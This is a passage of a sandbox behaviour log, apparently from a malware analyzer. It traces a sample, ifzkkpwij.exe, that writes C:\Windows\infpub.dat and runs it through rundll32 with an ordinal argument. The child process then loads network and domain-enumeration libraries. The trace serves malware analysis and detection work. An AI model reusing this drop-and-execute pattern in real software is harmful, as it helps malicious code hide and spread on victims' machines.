# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Oct 17 2017 16:08:19 # Log Creation Date: 25.10.2017 15:16:29.212 Process: id = "1" image_name = "ifzkkpwij.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ifzkkpwij.exe" page_root = "0x6219f000" os_pid = "0x948" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ifzkkpwij.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 6 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 8 start_va = 0xff0000 end_va = 0x1001fff entry_point = 0xff0000 region_type = mapped_file name = "ifzkkpwij.exe" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ifzkkpwij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ifzkkpwij.exe") Region: id = 9 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 12 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 13 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 14 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 15 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 16 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 17 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 150 start_va = 0x490000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 151 start_va = 0x744a0000 end_va = 0x744a7fff entry_point = 0x744a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 152 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 153 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x74510000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 154 start_va = 0x620000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 155 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 156 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x76600000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 157 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 158 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 159 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 160 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 161 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 162 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 163 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 164 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74ca0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 165 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 166 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e80000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 167 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74ea0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 168 start_va = 0x74f40000 end_va = 0x75b89fff entry_point = 0x74f40000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 169 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ee0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 170 start_va = 0x76070000 end_va = 0x760c6fff entry_point = 0x76070000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 171 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x763f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 172 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76510000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 173 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 174 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 175 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 176 start_va = 0x840000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 177 start_va = 0x850000 end_va = 0x9d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 178 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b30000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 179 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 180 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 181 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 182 start_va = 0x9e0000 end_va = 0xb60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 183 start_va = 0x1010000 end_va = 0x240ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001010000" filename = "" Thread: id = 1 os_tid = 0x94c [0014.409] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ifzkkpwij.exe\" " [0014.409] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ifzkkpwij.exe\" " [0014.409] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ifzkkpwij.exe\" ", pNumArgs=0x37e8f0 | out: pNumArgs=0x37e8f0) returned 0x634b68*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ifzkkpwij.exe" [0014.409] GetSystemDirectoryW (in: lpBuffer=0x37f524, uSize=0x30c | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0014.409] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\rundll32.exe" | out: lpString1="C:\\Windows\\system32\\rundll32.exe") returned="C:\\Windows\\system32\\rundll32.exe" [0014.410] GetModuleHandleW (lpModuleName=0x0) returned 0xff0000 [0014.410] GetModuleFileNameW (in: hModule=0xff0000, lpFilename=0x37e264, nSize=0x30c | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ifzkkpwij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ifzkkpwij.exe")) returned 0x33 [0014.410] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ifzkkpwij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ifzkkpwij.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7c [0014.411] GetFileSize (in: hFile=0x7c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6be2b [0014.411] ReadFile (in: hFile=0x7c, lpBuffer=0x634be0, nNumberOfBytesToRead=0x6be2b, lpNumberOfBytesRead=0x37e238, lpOverlapped=0x0 | out: lpBuffer=0x634be0*, lpNumberOfBytesRead=0x37e238*=0x6be2b, lpOverlapped=0x0) returned 1 [0014.416] CloseHandle (hObject=0x7c) returned 1 [0014.422] CreateFileW (lpFileName="C:\\Windows\\infpub.dat" (normalized: "c:\\windows\\infpub.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7c [0014.423] WriteFile (in: hFile=0x7c, lpBuffer=0x380048*, nNumberOfBytesToWrite=0x64488, lpNumberOfBytesWritten=0x37e884, lpOverlapped=0x0 | out: lpBuffer=0x380048*, lpNumberOfBytesWritten=0x37e884*=0x64488, lpOverlapped=0x0) returned 1 [0014.427] CloseHandle (hObject=0x7c) returned 1 [0014.430] wsprintfW (in: param_1=0x37ef0c, param_2="%ws C:\\Windows\\%ws,#1 %ws" | out: param_1="C:\\Windows\\system32\\rundll32.exe C:\\Windows\\infpub.dat,#1 15") returned 60 [0014.430] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\rundll32.exe", lpCommandLine="C:\\Windows\\system32\\rundll32.exe C:\\Windows\\infpub.dat,#1 15", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x37e894*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37e8d8 | out: lpCommandLine="C:\\Windows\\system32\\rundll32.exe C:\\Windows\\infpub.dat,#1 15", lpProcessInformation=0x37e8d8*(hProcess=0x80, hThread=0x7c, dwProcessId=0x960, dwThreadId=0x964)) returned 1 [0014.438] ExitProcess (uExitCode=0x0) Process: id = "2" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x61e29000" os_pid = "0x960" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x948" cmd_line = "C:\\Windows\\system32\\rundll32.exe C:\\Windows\\infpub.dat,#1 15" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 184 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 185 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 186 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 187 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 188 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 189 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 190 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 191 start_va = 0xfb0000 end_va = 0xfbdfff entry_point = 0xfb0000 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 192 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 193 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 194 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 195 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 196 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 197 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 198 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 199 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 200 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 201 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 202 start_va = 0x744a0000 end_va = 0x744a7fff entry_point = 0x744a20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 203 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744ef798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 204 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x7453de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 205 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 206 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 207 start_va = 0x390000 end_va = 0x3f6fff entry_point = 0x390000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 208 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 209 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74aea3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 210 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74cbb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 211 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 212 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e84975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 213 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74eb49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 214 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ef0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 215 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x76406343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 216 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76543fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 217 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 218 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x766132d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 219 start_va = 0x76870000 end_va = 0x76899fff entry_point = 0x76870000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 220 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a4a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 221 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 222 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 223 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 224 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 225 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 226 start_va = 0x560000 end_va = 0x6e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 227 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b4158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 228 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 229 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 230 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 231 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 232 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 233 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 234 start_va = 0x6f0000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 235 start_va = 0x880000 end_va = 0xbc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 236 start_va = 0xd00000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 237 start_va = 0xfc0000 end_va = 0x23bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 238 start_va = 0x747c0000 end_va = 0x74803fff entry_point = 0x747c0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 239 start_va = 0x74810000 end_va = 0x74843fff entry_point = 0x74810000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\SysWOW64\\adsldpc.dll" (normalized: "c:\\windows\\syswow64\\adsldpc.dll") Region: id = 240 start_va = 0x74850000 end_va = 0x7485afff entry_point = 0x74850000 region_type = mapped_file name = "dsauth.dll" filename = "\\Windows\\SysWOW64\\dsauth.dll" (normalized: "c:\\windows\\syswow64\\dsauth.dll") Region: id = 241 start_va = 0x74860000 end_va = 0x7486efff entry_point = 0x74860000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 242 start_va = 0x74870000 end_va = 0x74885fff entry_point = 0x74870000 region_type = mapped_file name = "dhcpsapi.dll" filename = "\\Windows\\SysWOW64\\dhcpsapi.dll" (normalized: "c:\\windows\\syswow64\\dhcpsapi.dll") Region: id = 243 start_va = 0x74890000 end_va = 0x7489cfff entry_point = 0x74890000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 244 start_va = 0x748a0000 end_va = 0x748aefff entry_point = 0x748a0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 245 start_va = 0x748b0000 end_va = 0x748c8fff entry_point = 0x748b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 246 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 247 start_va = 0x748e0000 end_va = 0x748f0fff entry_point = 0x748e0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 248 start_va = 0x74900000 end_va = 0x74911fff entry_point = 0x74900000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 249 start_va = 0x74920000 end_va = 0x74926fff entry_point = 0x74920000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 250 start_va = 0x74930000 end_va = 0x7494bfff entry_point = 0x74930000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 251 start_va = 0x74950000 end_va = 0x749b7fff entry_point = 0x74950000 region_type = mapped_file name = "infpub.dat" filename = "\\Windows\\infpub.dat" (normalized: "c:\\windows\\infpub.dat") Region: id = 252 start_va = 0x74f40000 end_va = 0x75b89fff entry_point = 0x74fc1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 253 start_va = 0x75fd0000 end_va = 0x75fd5fff entry_point = 0x75fd0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 254 start_va = 0x76070000 end_va = 0x760c6fff entry_point = 0x76089ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 255 start_va = 0x760d0000 end_va = 0x761ecfff entry_point = 0x760d0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 256 start_va = 0x76280000 end_va = 0x762c4fff entry_point = 0x76280000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: 